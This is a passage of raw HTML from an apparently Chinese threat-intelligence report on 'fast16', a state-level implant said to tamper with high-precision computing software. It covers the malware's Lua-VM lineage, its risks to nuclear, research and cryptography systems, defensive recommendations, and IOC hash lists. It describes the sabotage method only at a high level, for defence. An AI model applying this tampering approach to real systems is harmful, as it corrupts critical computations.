style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">约2012-2014年</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">轻量化Lua脚本执行环境</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Project Sauron</span></strong></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2015年</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">基于Lua VM的可扩展攻击平台</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这一现象并非巧合。Lua语言作为轻量级嵌入式脚本引擎，与C/C++具有天然的亲和性，能够无缝扩展已感染系统上的恶意功能，同时避免重新编译整个植入体。对于追求长期潜伏和动态能力更新的国级攻击团队而言，这种架构设计具有显著的战略价值。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">技术传承分析</span></strong><span leaf="">：虽然目前尚未发现直接代码共享的证据，但多个独立APT组织不约而同地采用Lua VM架构，表明这一开发范式在顶级网络攻击领域已形成某种&#34;技术共识&#34;。fast16作为该架构的最早实践者，对后续Flame、Sauron等攻击平台的发展具有重要的先导意义。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从破坏性攻击到持久化潜伏</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">fast16的攻击模式代表了国级网络攻击的早期形态：</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">直接、精准、定向破坏</span></strong><span leaf="">。针对高精度计算软件的代码篡改攻击能够在不引起注意的情况下持续输出错误结果，适用于对核研究、密码学运算等关键领域的长期干扰。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">随着时间推移，同类APT组织的攻击战术呈现演进趋势。Stuxnet（2010年）代表了破坏性攻击的巅峰，但同时也招致了国际社会的强烈关注。此后的APT攻击逐渐转向</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">持久化潜伏+情报窃取</span></strong><span leaf="">模式，攻击者更倾向于长期隐蔽在目标网络中收集情报，而非实施直接破坏。这种战术转型与攻击者对曝光风险的敏感度提升密切相关。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对于国内关键信息基础设施而言，这一演进趋势意味着防御策略需要兼顾传统破坏性攻击和新型持久化渗透两种威胁形态。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对国内关键基础设施的影响评估</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">高精度计算领域的潜在风险</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">fast16的技术目标——</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高精度计算软件</span></strong><span leaf="">——涵盖了先进物理模拟、密码学运算、核研究等国家级关键工作负载。这些领域在国内主要分布于：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">科研机构<span textstyle="" style="font-weight: normal;">：高校和国家实验室的高性能计算集群</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">核能行业<span textstyle="" style="font-weight: normal;">：核电站设计模拟和燃料循环计算系统</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">密码学研究<span textstyle="" style="font-weight: normal;">：金融和军事领域的加密算法开发</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">加密货币<span textstyle="" style="font-weight: normal;">：虽然原文提及，但该领域在国内规模相对有限</span></span></strong></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">尽管fast16编译于2005年，无法直接运行于现代系统，但其揭示的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">代码篡改攻击范式</span></strong><span leaf="">对当前安全防御仍具警示意义。任何针对高精度计算软件供应链的攻击——无论是开发工具污染、代码仓库篡改还是运行时注入——都可能产生与fast16类似的破坏效果。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">供应链安全启示</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">fast16的模块化架构和动态载荷设计，揭示了供应链攻陷的巨大威力。攻击者只需要在软件供应链的某一环节植入初始载体，即可在目标网络中持续获得执行能力，并通过Lua脚本的动态更新实现功能迭代。这种攻击模式对传统的基于特征码的防御机制构成严峻挑战。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心建议，关键信息基础设施运营者应当：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">加强供应链透明度<span textstyle="" style="font-weight: normal;">：对引入的第三方软件和组件进行严格的代码审计和完整性验证</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">实施可信计算<span textstyle="" style="font-weight: normal;">：部署基于硬件的信任根，确保系统启动链的完整性</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">监控计算结果异常<span textstyle="" style="font-weight: normal;">：针对高精度计算场景建立基准输出库，及时发现系统性偏差</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">关注内核驱动安全<span textstyle="" style="font-weight: normal;">：对加载的内核驱动进行签名验证，防止恶意驱动的部署</span></span></strong></li></ol><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">失陷指标（IOC）</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">核心文件哈希</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">文件名</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">MD5</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">SHA256</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">svcmgmt.exe</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">dbe51eabebf9d4ef9581ef99844a2944</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">9a10e1faa86a5d39417cae44da5adf38824dfb9a16432e34df766aa1dc9e3525</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">fast16.sys</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">0ff6abe0252d4f37a196a1231fae5f26</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">07c69fc33271cf5a2ce03ac1fed7a3b16357aec093c5bf9ef61fbfa4348d0529</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">完整IOC列表</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">MD5哈希</span></strong><span leaf="">：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">dbe51eabebf9d4ef9581ef99844a2944</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">0ff6abe0252d4f37a196a1231fae5f26</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">410eddfc19de44249897986ecc8ac449</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">1d2f32c57ae2f2013f513d342925e972</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">af4461a149bfd2ba566f2abefe7dcde4</span></p></li></ul><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">49a8934ccd34e2aaae6ea1e6a6313ffe</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">e0c10106626711f287ff91c0d6314407</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">2717b58246237b35d44ef2e49712d3a2</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">daea40562458fc7ae1adb812137d3d05</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">2740a703859cbd8b43425d4a2cacb5ec</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">ebff5b7d4c5becb8715009df596c5a91</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">cb66a4d52a30bfcd980fe50e7e3f73f0</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">075b4aa105e728f2b659723e3f36c72c</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">cf859f164870d113608a843e4a9600ab</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">f4dbbb78979c1ee8a1523c77065e18a5</span></p></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">SHA1哈希</span></strong><span leaf="">：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span 